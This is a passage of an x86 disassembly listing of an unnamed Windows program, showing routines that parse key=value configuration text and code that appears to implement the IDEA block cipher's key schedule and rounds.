loc_492ED5: ; CODE XREF: sub_492CC4+204�j
cmp [ebp+var_24], 1
jnz short loc_492EE0
jmp loc_492E25
; ---------------------------------------------------------------------------
loc_492EE0: ; CODE XREF: sub_492CC4+215�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
jmp loc_493184
; ---------------------------------------------------------------------------
loc_492EEC: ; CODE XREF: sub_492CC4+20F�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_493184
cmp [ebp+arg_0], 0
jz loc_493151
mov eax, [ebp+var_38]
mov byte ptr [eax], 20h
loc_492F0B: ; CODE XREF: sub_492CC4+266�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 9
jz short loc_492F23
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_492F2C
loc_492F23: ; CODE XREF: sub_492CC4+251�j
mov eax, [ebp+var_38]
dec eax
mov [ebp+var_38], eax
jmp short loc_492F0B
; ---------------------------------------------------------------------------
loc_492F2C: ; CODE XREF: sub_492CC4+25D�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_492F39: ; CODE XREF: sub_492CC4+292�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 9
jz short loc_492F4F
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_492F58
loc_492F4F: ; CODE XREF: sub_492CC4+27E�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_492F39
; ---------------------------------------------------------------------------
loc_492F58: ; CODE XREF: sub_492CC4+289�j
cmp [ebp+arg_4], 0
jnz loc_4930A1
movzx eax, [ebp+var_48]
test eax, eax
jz loc_49309C
mov eax, [ebp+var_44]
mov [ebp+var_58], eax
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
cmp eax, [ebp+var_60]
jge short loc_492F9F
mov eax, [ebp+var_6C]
mov [ebp+var_78], eax
jmp short loc_492FA5
; ---------------------------------------------------------------------------
loc_492F9F: ; CODE XREF: sub_492CC4+2D1�j
mov eax, [ebp+var_60]
mov [ebp+var_78], eax
loc_492FA5: ; CODE XREF: sub_492CC4+2D9�j
mov eax, [ebp+var_78]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_492FD4
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_492FD4: ; CODE XREF: sub_492CC4+2EB�j
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_492FDA: ; CODE XREF: sub_492CC4+33C�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_493002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_493002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_493002
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_492FDA
; ---------------------------------------------------------------------------
loc_493002: ; CODE XREF: sub_492CC4+31D�j
; sub_492CC4+328�j ...
movzx eax, [ebp+arg_18]
test eax, eax
jz loc_49308E
mov eax, [ebp+arg_10]
dec eax
dec eax
cmp [ebp+var_58], eax
jnb short loc_493028
mov eax, [ebp+arg_C]
add eax, [ebp+var_58]
mov byte ptr [eax], 3Dh
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_58], eax
loc_493028: ; CODE XREF: sub_492CC4+352�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_70], eax
mov eax, [ebp+var_70]
cmp eax, [ebp+var_60]
jge short loc_493059
mov eax, [ebp+var_70]
mov [ebp+var_7C], eax
jmp short loc_49305F
; ---------------------------------------------------------------------------
loc_493059: ; CODE XREF: sub_492CC4+38B�j
mov eax, [ebp+var_60]
mov [ebp+var_7C], eax
loc_49305F: ; CODE XREF: sub_492CC4+393�j
mov eax, [ebp+var_7C]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_49308E
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_49308E: ; CODE XREF: sub_492CC4+344�j
; sub_492CC4+3A5�j
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_44], eax
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
loc_49309C: ; CODE XREF: sub_492CC4+2A4�j
jmp loc_49314F
; ---------------------------------------------------------------------------
loc_4930A1: ; CODE XREF: sub_492CC4+298�j
push [ebp+var_3C]
push [ebp+arg_4]
call ds:dword_4A27C0 ; lstrcmpi
test eax, eax
jnz short loc_49311C
movzx eax, [ebp+var_48]
test eax, eax
jz short loc_49311C
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_4930BF: ; CODE XREF: sub_492CC4+421�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4930E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4930E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4930E7
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4930BF
; ---------------------------------------------------------------------------
loc_4930E7: ; CODE XREF: sub_492CC4+402�j
; sub_492CC4+40D�j ...
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+var_3C]
push [ebp+arg_C]
call sub_48D770
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+arg_10]
and byte ptr [eax-1], 0
mov edi, [ebp+arg_C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_44], ecx
jmp short loc_493189
; ---------------------------------------------------------------------------
loc_49311C: ; CODE XREF: sub_492CC4+3EB�j
; sub_492CC4+3F3�j ...
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_493144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_493144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_493144
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_49311C
; ---------------------------------------------------------------------------
loc_493144: ; CODE XREF: sub_492CC4+45F�j
; sub_492CC4+46A�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_492DB9
; ---------------------------------------------------------------------------
loc_49314F: ; CODE XREF: sub_492CC4:loc_49309C�j
jmp short loc_493184
; ---------------------------------------------------------------------------
loc_493151: ; CODE XREF: sub_492CC4+23B�j
; sub_492CC4+4B3�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_493179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_493179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_493179
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_493151
; ---------------------------------------------------------------------------
loc_493179: ; CODE XREF: sub_492CC4+494�j
; sub_492CC4+49F�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_492DB9
; ---------------------------------------------------------------------------
loc_493184: ; CODE XREF: sub_492CC4+14D�j
; sub_492CC4:loc_492EBA�j ...
jmp loc_492DA6
; ---------------------------------------------------------------------------
loc_493189: ; CODE XREF: sub_492CC4+EF�j
; sub_492CC4+12F�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_493194
jmp short loc_4931B6
sub_492CC4 endp
; =============== S U B R O U T I N E =======================================
sub_493194 proc near ; CODE XREF: sub_492CC4+4C9�p
; DATA XREF: _5:0049F400�o
mov eax, [ebp-34h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_4993DD
pop ecx
cmp dword ptr [ebp-2Ch], 0FFFFFFFFh
jz short locret_4931B5
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-2Ch]
call sub_491741
locret_4931B5: ; CODE XREF: sub_493194+13�j
retn
sub_493194 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_492CC4
loc_4931B6: ; CODE XREF: sub_492CC4+4CE�j
mov eax, [ebp+var_44]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_492CC4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
push dword ptr [ebp-4]
push dword ptr [ebp+8]
mov ecx, [ebp-4]
call sub_4931F3
mov eax, [ebp-4]
add eax, 68h
push eax
push dword ptr [ebp-4]
mov ecx, [ebp-4]
call sub_49329B
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4931F3 proc near ; CODE XREF: _4:004931D8�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
and [ebp+var_8], 0
jmp short loc_493209
; ---------------------------------------------------------------------------
loc_493202: ; CODE XREF: sub_4931F3+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_493209: ; CODE XREF: sub_4931F3+D�j
cmp [ebp+var_8], 8
jge short loc_493235
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
shl eax, 8
mov ecx, [ebp+arg_0]
movzx ecx, byte ptr [ecx+1]
add eax, ecx
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx+ecx*2], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
jmp short loc_493202
; ---------------------------------------------------------------------------
loc_493235: ; CODE XREF: sub_4931F3+1A�j
and [ebp+var_4], 0
jmp short loc_493242
; ---------------------------------------------------------------------------
loc_49323B: ; CODE XREF: sub_4931F3+A2�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_493242: ; CODE XREF: sub_4931F3+46�j
cmp [ebp+var_8], 34h
jge short locret_493297
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov ecx, [ebp+arg_4]
movzx eax, word ptr [ecx+eax*2]
shl eax, 9
mov ecx, [ebp+var_4]
inc ecx
and ecx, 7
mov edx, [ebp+arg_4]
movzx ecx, word ptr [edx+ecx*2]
sar ecx, 7
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [edx+ecx*2+0Eh], ax
mov eax, [ebp+var_4]
and eax, 8
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*2]
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov [ebp+var_4], eax
jmp short loc_49323B
; ---------------------------------------------------------------------------
locret_493297: ; CODE XREF: sub_4931F3+53�j
leave
retn 8
sub_4931F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49329B proc near ; CODE XREF: _4:004931EA�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = word ptr -7Ch
var_78 = dword ptr -78h
var_74 = word ptr -74h
var_70 = word ptr -70h
var_6C = word ptr -6Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push esi
push edi
mov [ebp+var_80], ecx
lea eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_84], ax
push [ebp+var_84]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_49359C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_88], ax
push [ebp+var_88]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_49359C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
and [ebp+var_78], 0
jmp short loc_493372
; ---------------------------------------------------------------------------
loc_49336B: ; CODE XREF: sub_49329B+1D7�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_493372: ; CODE XREF: sub_49329B+CE�j
cmp [ebp+var_78], 7
jge loc_493477
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_8C], ax
push [ebp+var_8C]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_49359C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_90], ax
push [ebp+var_90]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_49359C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
jmp loc_49336B
; ---------------------------------------------------------------------------
loc_493477: ; CODE XREF: sub_49329B+DB�j
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_94], ax
push [ebp+var_94]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_49359C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_98], ax
push [ebp+var_98]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_49359C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
push 1Ah
pop ecx
lea esi, [ebp+var_6C]
mov edi, [ebp+arg_4]
rep movsd
and [ebp+var_78], 0
jmp short loc_493585
; ---------------------------------------------------------------------------
loc_49357E: ; CODE XREF: sub_49329B+2F9�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_493585: ; CODE XREF: sub_49329B+2E1�j
cmp [ebp+var_78], 34h
jge short loc_493596
mov eax, [ebp+var_78]
and [ebp+eax*2+var_6C], 0
jmp short loc_49357E
; ---------------------------------------------------------------------------
loc_493596: ; CODE XREF: sub_49329B+2EE�j
pop edi
pop esi
leave
retn 8
sub_49329B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49359C proc near ; CODE XREF: sub_49329B+32�p
; sub_49329B+81�p ...
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
movzx eax, [ebp+arg_0]
cmp eax, 1
jg short loc_4935B7
mov ax, [ebp+arg_0]
jmp locret_49368F
; ---------------------------------------------------------------------------
loc_4935B7: ; CODE XREF: sub_49359C+10�j
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_C], ax
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_4935F7
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
jmp locret_49368F
; ---------------------------------------------------------------------------
loc_4935F7: ; CODE XREF: sub_49359C+42�j
mov [ebp+var_8], 1
loc_4935FD: ; CODE XREF: sub_49359C+DF�j
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+arg_0], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_C]
imul eax, ecx
mov cx, [ebp+var_8]
add cx, ax
mov [ebp+var_8], cx
movzx eax, [ebp+arg_0]
cmp eax, 1
jnz short loc_493640
mov ax, [ebp+var_8]
jmp short locret_49368F
; ---------------------------------------------------------------------------
loc_493640: ; CODE XREF: sub_49359C+9C�j
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_8]
imul eax, ecx
mov cx, [ebp+var_C]
add cx, ax
mov [ebp+var_C], cx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_4935FD
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
locret_49368F: ; CODE XREF: sub_49359C+16�j
; sub_49359C+56�j ...
leave
retn 4
sub_49359C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_4936AF
; ---------------------------------------------------------------------------
loc_4936A8: ; CODE XREF: _4:004936D1�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_4936AF: ; CODE XREF: _4:004936A6�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_4936D3
push dword ptr [ebp-0Ch]
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_4936D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_4936A8
; ---------------------------------------------------------------------------
locret_4936D3: ; CODE XREF: _4:004936B5�j
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4936D7 proc near ; CODE XREF: _4:004936C3�p _4:00493D36�p
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_28 = word ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = word ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 48h
push ebx
mov [ebp+var_30], ecx
mov [ebp+var_4], 8
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_1C], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_20], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_28], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_2C], ax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov [ebp+var_1C], ax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov [ebp+var_20], ax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov [ebp+var_28], ax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov [ebp+var_2C], ax
loc_49377E: ; CODE XREF: sub_4936D7+41E�j
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_49381D
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_4937FE
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
jmp short loc_493813
; ---------------------------------------------------------------------------
loc_4937FE: ; CODE XREF: sub_4936D7+D8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
loc_493813: ; CODE XREF: sub_4936D7+125�j
mov ax, [ebp+var_32]
mov [ebp+var_34], ax
jmp short loc_493832
; ---------------------------------------------------------------------------
loc_49381D: ; CODE XREF: sub_4936D7+BF�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_34], ax
loc_493832: ; CODE XREF: sub_4936D7+144�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4938FD
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_4938DE
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
jmp short loc_4938F3
; ---------------------------------------------------------------------------
loc_4938DE: ; CODE XREF: sub_4936D7+1B8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
loc_4938F3: ; CODE XREF: sub_4936D7+205�j
mov ax, [ebp+var_36]
mov [ebp+var_38], ax
jmp short loc_493912
; ---------------------------------------------------------------------------
loc_4938FD: ; CODE XREF: sub_4936D7+19F�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_38], ax
loc_493912: ; CODE XREF: sub_4936D7+224�j
mov ax, [ebp+var_28]
mov [ebp+var_14], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_1C]
mov [ebp+var_28], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4939C5
movzx eax, [ebp+var_28]
and eax, 0FFFFh
mov [ebp+var_28], ax
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_4939A6
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_28], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_28]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_28], ax
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
